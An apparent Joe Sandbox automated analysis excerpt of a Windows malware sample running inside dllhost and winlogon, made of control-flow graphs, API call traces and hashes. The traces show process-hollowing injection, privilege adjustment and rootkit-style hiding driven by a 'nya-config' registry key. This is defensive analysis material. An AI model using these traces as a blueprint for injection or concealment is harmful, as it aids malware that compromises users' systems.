                                            control_flow_graph 259 140003634-140003688 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 260 14000368a-14000369d K32EnumProcesses 259->260 261 1400036e7-1400036f0 Sleep 260->261 262 14000369f-1400036ae 260->262 261->260 263 1400036d8-1400036e3 262->263 264 1400036b0-1400036b4 262->264 263->261 265 1400036b6 264->265 266 1400036c7-1400036ca call 140003190 264->266 267 1400036ba-1400036bf 265->267 268 1400036ce 266->268 269 1400036c1-1400036c5 267->269 270 1400036d2-1400036d6 267->270 268->270 269->266 269->267 270->263 270->264
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess$EnumProcessesSleep
                                            • String ID:
                                            • API String ID: 3676546796-0
                                            • Opcode ID: 81151b99d530d65dfa122e6c8ce9ef601985b82c456e08e1a9a7be0ad97868de
                                            • Instruction ID: a1b66254d96c7cf11d413aba10b9c6aee428658a90ca8d6027ab0afa1d9e2250
                                            • Opcode Fuzzy Hash: 81151b99d530d65dfa122e6c8ce9ef601985b82c456e08e1a9a7be0ad97868de
                                            • Instruction Fuzzy Hash: 2C1160B270065196E716DB17F81475A7AA6F789BC1F558128EF4207B78CF3AD884CB40

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                            • String ID:
                                            • API String ID: 1323846700-0
                                            • Opcode ID: 9e888eed53e2bb10b5f797a2cff84821bb432324b3c6bbcbdbea6ae691bf0545
                                            • Instruction ID: 146a1b11f62a0205da1b5a2207c4e551d66db48d886c31f99c97199126aec534
                                            • Opcode Fuzzy Hash: 9e888eed53e2bb10b5f797a2cff84821bb432324b3c6bbcbdbea6ae691bf0545
                                            • Instruction Fuzzy Hash: 77114CB1B0564086FB16DF27B84439A66A1AB8DBD4F488028FF0903776EE39C4868704

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 283 140002d38-140002d3c call 140002d4c 285 140002d41-140002d43 ExitProcess 283->285
                                            APIs
                                              • Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D74
                                              • Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D84
                                              • Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D9E
                                              • Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DB5
                                              • Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002DED
                                              • Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002DF7
                                              • Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E00
                                              • Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E29
                                              • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E59
                                              • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E89
                                              • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E9D
                                              • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EAB
                                              • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBE
                                              • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ECC
                                            • ExitProcess.KERNEL32 ref: 0000000140002D43
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Process$Heap$OpenValue$AllocQueryToken$AdjustCloseCurrentErrorExitHandleLastLookupPrivilegePrivileges
                                            • String ID:
                                            • API String ID: 2472495637-0
                                            • Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                            • Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
                                            • Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                            • Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 343 140002434-140002469 344 140002911 343->344 345 14000246f-14000247b 343->345 348 140002913-14000292d 344->348 346 140002493 345->346 347 14000247d-140002487 345->347 350 140002496-140002499 346->350 347->344 349 14000248d-140002491 347->349 349->350 351 1400024d4 350->351 352 14000249b-1400024b6 call 1400020cc 350->352 353 1400024d7-140002532 CreateProcessW 351->353 352->344 369 1400024bc-1400024c7 352->369 355 1400028d7-1400028df 353->355 356 140002538-14000254f 353->356 358 1400028e1-1400028ef OpenProcess 355->358 359 1400028fc-140002903 355->359 360 140002555-14000258f call 1400020cc VirtualAllocEx 356->360 361 140002730-140002767 call 1400020cc VirtualAllocEx 356->361 358->359 362 1400028f1-1400028f6 TerminateProcess 358->362 359->344 364 140002905-14000290c 359->364 360->355 373 140002595-1400025b1 WriteProcessMemory 360->373 361->355 374 14000276d-140002789 WriteProcessMemory 361->374 362->359 364->353 369->344 370 1400024cd 369->370 370->351 373->355 375 1400025b7-1400025dc VirtualProtectEx 373->375 374->355 376 14000278f-1400027b3 VirtualProtectEx 374->376 375->355 378 1400025e2-1400025f0 375->378 376->355 377 1400027b9-1400027c7 376->377 379 140002858-140002877 VirtualAlloc 377->379 380 1400027cd 377->380 381 140002682-1400026a1 VirtualAlloc 378->381 382 1400025f6 378->382 379->355 385 140002879-14000288f Wow64GetThreadContext 379->385 383 1400027d0-1400027f2 WriteProcessMemory 380->383 381->355 384 1400026a7-1400026be GetThreadContext 381->384 386 1400025f9-14000261b WriteProcessMemory 382->386 387 1400028d5 383->387 388 1400027f8-140002803 383->388 384->355 389 1400026c4-1400026e9 WriteProcessMemory 384->389 385->355 390 140002891-1400028b4 WriteProcessMemory 385->390 386->387 391 140002621-14000262c 386->391 387->355 392 140002805-140002809 388->392 393 14000280b 388->393 389->355 394 1400026ef-14000270c SetThreadContext 389->394 390->355 395 1400028b6-1400028ca Wow64SetThreadContext 390->395 396 140002634 391->396 397 14000262e-140002632 391->397 398 14000280f-14000283e call 140002930 VirtualProtectEx 392->398 393->398 394->355 399 140002712-140002720 ResumeThread 394->399 395->387 400 140002638-140002665 call 140002930 VirtualProtectEx 396->400 397->400 398->387 407 140002844-140002852 398->407 399->355 403 140002726-14000272b 399->403 400->387 406 14000266b-14000267c 400->406 403->348 406->381 406->386 407->379 407->383
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
                                            • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                            • API String ID: 1036100660-1371749706
                                            • Opcode ID: 062723520bc959b99614c26b60837a5fa848bce833f489094e5110284047cdb9
                                            • Instruction ID: fe181f3da7762b1cf8407140d3e190fa013b7b60483d6e0a4c0671c43d788581
                                            • Opcode Fuzzy Hash: 062723520bc959b99614c26b60837a5fa848bce833f489094e5110284047cdb9
                                            • Instruction Fuzzy Hash: ACD16FB270568187EB65CF63F84479AB7A0F788BC4F044025EB8A47BA4DF78D599CB04

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
                                            • Instruction ID: cbe0a9e96035c6652df35f1bebe582e7c0167c489293dce8c24ece8bd57d0938
                                            • Opcode Fuzzy Hash: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
                                            • Instruction Fuzzy Hash: C35128B2604B8486EB56DF62F4483AA77A1F78CBD5F444124EB4A07B79DF38C555C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                            • String ID:
                                            • API String ID: 4184240511-0
                                            • Opcode ID: 84ff88ccb10f49b49e4af97301c9a9495f723d3e4f2f51ef83b7847e1ee965a3
                                            • Instruction ID: 0e6833bd3eeca7de3220de005558475a35c56d9be5ad7e086776b2a4e8a7938b
                                            • Opcode Fuzzy Hash: 84ff88ccb10f49b49e4af97301c9a9495f723d3e4f2f51ef83b7847e1ee965a3
                                            • Instruction Fuzzy Hash: 894147B2700A859AE711CF6AE8843DD73B1FB89B89F445225FF0A43A69DF38C159C304

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
                                            • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 3993315683-3572789727
                                            • Opcode ID: 160cb157803c8d75397eda194766d4b99425b2e4efbbed3557b40dfd9c0fc54d
                                            • Instruction ID: 5ebcb72c0a3035c4b67d8f00751cefd31434bbf5df89411654f5c91112f76ea3
                                            • Opcode Fuzzy Hash: 160cb157803c8d75397eda194766d4b99425b2e4efbbed3557b40dfd9c0fc54d
                                            • Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
                                            • Instruction ID: 42b997484051ce9e6daf6bc3104cf1544be02307d9272190f1dec121864cc25c
                                            • Opcode Fuzzy Hash: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
                                            • Instruction Fuzzy Hash: E1412AB2214B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Delete$CloseEnumOpen
                                            • String ID: SOFTWARE\$nya-config
                                            • API String ID: 3013565938-2636501262
                                            • Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                            • Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
                                            • Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                            • Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: 80d9ba640633e664d37536508cc0a4a26b735903ebb0d8b8d4ae8ea91fecf4e1
                                            • Instruction ID: ae713076178dcd36b59d2bede7e3524c8608a398496d325058d9822cf47af1f0
                                            • Opcode Fuzzy Hash: 80d9ba640633e664d37536508cc0a4a26b735903ebb0d8b8d4ae8ea91fecf4e1
                                            • Instruction Fuzzy Hash: D80102B2610A908AE705EF67B90438977A1F78CFC5F4A4025FB9953739DE38D491C744
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: ntdll.dll
                                            • API String ID: 1646373207-2227199552
                                            • Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                            • Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
                                            • Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                            • Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
                                            • Instruction ID: 1511527892a3fb8eded8389ff9e17f75ca8e9e74a60c21ae91e61c536c9c2234
                                            • Opcode Fuzzy Hash: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
                                            • Instruction Fuzzy Hash: 39E039F170160086E705DB63E80438936E1EB8CB81F858024DA1907371DF7D84D98750
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                            • Instruction ID: 4369636dfc19c6b46be3dddb2077bf5e2e0bd1da0e3c66b1f75a47794e7da392
                                            • Opcode Fuzzy Hash: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                            • Instruction Fuzzy Hash: 78E0E5F1751A0086E70ADB63E80439976E1FB8CB91F898024EA1907731EE3884D98A24

                                            Execution Graph

                                            Execution Coverage:1.4%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:2.7%
                                            Total number of Nodes:111
                                            Total number of Limit Nodes:17
                                            execution_graph 22415 1ca7d1e41f9 22418 1ca7d1e4146 _invalid_parameter_noinfo 22415->22418 22416 1ca7d1e41b0 22417 1ca7d1e4196 VirtualQuery 22417->22416 22417->22418 22418->22416 22418->22417 22419 1ca7d1e41ca VirtualAlloc 22418->22419 22419->22416 22420 1ca7d1e41fb GetLastError 22419->22420 22420->22418 22422 1ca7d1e1bc4 22429 1ca7d1e1724 GetProcessHeap HeapAlloc 22422->22429 22424 1ca7d1e1bd3 22425 1ca7d1e1bda SleepEx 22424->22425 22428 1ca7d1e159c StrCmpIW StrCmpW 22424->22428 22480 1ca7d1e19b0 12 API calls 22424->22480 22426 1ca7d1e1724 50 API calls 22425->22426 22426->22424 22428->22424 22481 1ca7d1e1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22429->22481 22431 1ca7d1e174c 22482 1ca7d1e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22431->22482 22433 1ca7d1e1754 22483 1ca7d1e1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22433->22483 22435 1ca7d1e175d 22484 1ca7d1e1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22435->22484 22437 1ca7d1e1766 22485 1ca7d1e1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22437->22485 22439 1ca7d1e176f 22486 1ca7d1e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22439->22486 22441 1ca7d1e1778 22487 1ca7d1e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22441->22487 22443 1ca7d1e1781 22488 1ca7d1e1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22443->22488 22445 1ca7d1e178a RegOpenKeyExW 22446 1ca7d1e19a2 22445->22446 22447 1ca7d1e17bc RegOpenKeyExW 22445->22447 22446->22424 22448 1ca7d1e17e5 22447->22448 22449 1ca7d1e17fb RegOpenKeyExW 22447->22449 22495 1ca7d1e12b8 16 API calls 22448->22495 22451 1ca7d1e1836 RegOpenKeyExW 22449->22451 22452 1ca7d1e181f 22449->22452 22453 1ca7d1e1871 RegOpenKeyExW 22451->22453 22454 1ca7d1e185a 22451->22454 22489 1ca7d1e104c RegQueryInfoKeyW 22452->22489 22459 1ca7d1e1895 22453->22459 22460 1ca7d1e18ac RegOpenKeyExW 22453->22460 22496 1ca7d1e12b8 16 API calls 22454->22496 22455 1ca7d1e17f1 RegCloseKey 22455->22449 22497 1ca7d1e12b8 16 API calls 22459->22497 22463 1ca7d1e18e7 RegOpenKeyExW 22460->22463 22464 1ca7d1e18d0 22460->22464 22461 1ca7d1e1867 RegCloseKey 22461->22453 22467 1ca7d1e1922 RegOpenKeyExW 22463->22467 22468 1ca7d1e190b 22463->22468 22498 1ca7d1e12b8 16 API calls 22464->22498 22465 1ca7d1e18a2 RegCloseKey 22465->22460 22469 1ca7d1e1946 22467->22469 22470 1ca7d1e195d RegOpenKeyExW 22467->22470 22472 1ca7d1e104c 6 API calls 22468->22472 22474 1ca7d1e104c 6 API calls 22469->22474 22475 1ca7d1e1998 RegCloseKey 22470->22475 22476 1ca7d1e1981 22470->22476 22471 1ca7d1e18dd RegCloseKey 22471->22463 22473 1ca7d1e1918 RegCloseKey 22472->22473 22473->22467 22477 1ca7d1e1953 RegCloseKey 22474->22477 22475->22446 22478 1ca7d1e104c 6 API calls 22476->22478 22477->22470 22479 1ca7d1e198e RegCloseKey 22478->22479 22479->22475 22481->22431 22482->22433 22483->22435 22484->22437 22485->22439 22486->22441 22487->22443 22488->22445 22490 1ca7d1e11b5 RegCloseKey 22489->22490 22491 1ca7d1e10bf 22489->22491 22490->22451 22491->22490 22492 1ca7d1e10cf RegEnumValueW 22491->22492 22493 1ca7d1e1125 22492->22493 22493->22490 22493->22492 22494 1ca7d1e114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 22493->22494 22494->22493 22495->22455 22496->22461 22497->22465 22498->22471 22499 1ca7d1e2c80 TlsGetValue TlsGetValue TlsGetValue 22500 1ca7d1e2cd9 22499->22500 22501 1ca7d1e2d51 NtEnumerateValueKey 22499->22501 22500->22501 22506 1ca7d1e2ce1 22500->22506 22502 1ca7d1e2d4c 22501->22502 22509 1ca7d1e2d86 22501->22509 22503 1ca7d1e2d2d NtEnumerateValueKey 22503->22502 22503->22506 22504 1ca7d1e2e06 TlsSetValue TlsSetValue TlsSetValue 22504->22502 22505 1ca7d1e2da0 NtEnumerateValueKey 22505->22509 22506->22502 22506->22503 22506->22504 22510 1ca7d1e3f88 22506->22510 22508 1ca7d1e3f88 StrCmpNIW 22508->22509 22509->22502 22509->22504 22509->22505 22509->22508 22511 1ca7d1e3f95 StrCmpNIW 22510->22511 22512 1ca7d1e3faa 22510->22512 22511->22512 22512->22506 22513 1ca7d1e6430 22514 1ca7d1e643d 22513->22514 22515 1ca7d1e6449 22514->22515 22522 1ca7d1e655a 22514->22522 22516 1ca7d1e647e 22515->22516 22517 1ca7d1e64cd 22515->22517 22518 1ca7d1e64a6 SetThreadContext 22516->22518 22518->22517 22519 1ca7d1e6581 VirtualProtect FlushInstructionCache 22519->22522 22520 1ca7d1e663e 22521 1ca7d1e665e 22520->22521 22531 1ca7d1e4b20 VirtualFree 22520->22531 22532 1ca7d1e5530 GetCurrentProcess 22521->22532 22522->22519 22522->22520 22525 1ca7d1e6663 22526 1ca7d1e66b7 22525->22526 22527 1ca7d1e6677 ResumeThread 22525->22527 22536 1ca7d1e8070 8 API calls 2 library calls 22526->22536 22528 1ca7d1e66ab 22527->22528 22528->22525 22530 1ca7d1e66ff 22531->22521 22533 1ca7d1e554c 22532->22533 22534 1ca7d1e5562 VirtualProtect FlushInstructionCache 22533->22534 22535 1ca7d1e5593 22533->22535 22534->22533 22535->22525 22536->22530 22537 1ca7d1ef370 VirtualProtect 22539 1ca7d1e1e3c LoadLibraryA GetProcAddress 22540 1ca7d1e1e62 SleepEx 22539->22540 22541 1ca7d1e1e6f 22539->22541 22540->22540 22542 1ca7d1e5c8d 22544 1ca7d1e5c94 22542->22544 22543 1ca7d1e5cfb 22544->22543 22545 1ca7d1e5d77 VirtualProtect 22544->22545 22546 1ca7d1e5da3 GetLastError 22545->22546 22547 1ca7d1e5db1 22545->22547 22546->22547

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2752497541.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                            • Associated: 00000008.00000002.2751293356.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2753862020.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2754981107.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2756147153.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2757243971.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1ca7d1e0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Value$Enumerate
                                            • String ID:
                                            • API String ID: 3520290360-0
                                            • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction ID: ddcfc76e88451ae92f4f9cda427641abdeb8210533d5a923a24e23578d1e4606
                                            • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction Fuzzy Hash: BF51C333B4570487F326CB15E460E9AB3A4FB84B89F904119AE4A43754EF3AC905CB83

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 223 1ca7d1e1e3c-1ca7d1e1e60 LoadLibraryA GetProcAddress 224 1ca7d1e1e62-1ca7d1e1e6d SleepEx 223->224 225 1ca7d1e1e6f-1ca7d1e1e73 223->225 224->224
                                            APIs
                                            Strings
                                            Memory Dump Source
